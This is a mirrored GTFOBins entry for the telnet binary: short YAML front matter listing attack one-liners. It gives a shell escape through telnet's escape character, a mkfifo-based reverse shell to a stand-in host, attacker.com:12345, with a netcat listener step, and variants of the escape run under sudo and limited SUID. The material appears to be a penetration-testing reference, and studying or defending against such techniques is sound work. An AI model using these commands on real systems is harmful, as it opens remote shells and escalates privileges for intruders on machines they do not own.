mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
35 lines
860 B
Markdown
35 lines
860 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- description: BSD version only. Needs to be connected first.
|
|
code: |
|
|
RHOST=attacker.com
|
|
RPORT=12345
|
|
telnet $RHOST $RPORT
|
|
^]
|
|
!/bin/sh
|
|
reverse-shell:
|
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
|
code: |
|
|
RHOST=attacker.com
|
|
RPORT=12345
|
|
TF=$(mktemp -u)
|
|
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
|
|
sudo:
|
|
- description: BSD version only. Needs to be connected first.
|
|
code: |
|
|
RHOST=attacker.com
|
|
RPORT=12345
|
|
sudo telnet $RHOST $RPORT
|
|
^]
|
|
!/bin/sh
|
|
limited-suid:
|
|
- description: BSD version only. Needs to be connected first.
|
|
code: |
|
|
RHOST=attacker.com
|
|
RPORT=12345
|
|
./telnet $RHOST $RPORT
|
|
^]
|
|
!/bin/sh
|
|
---
|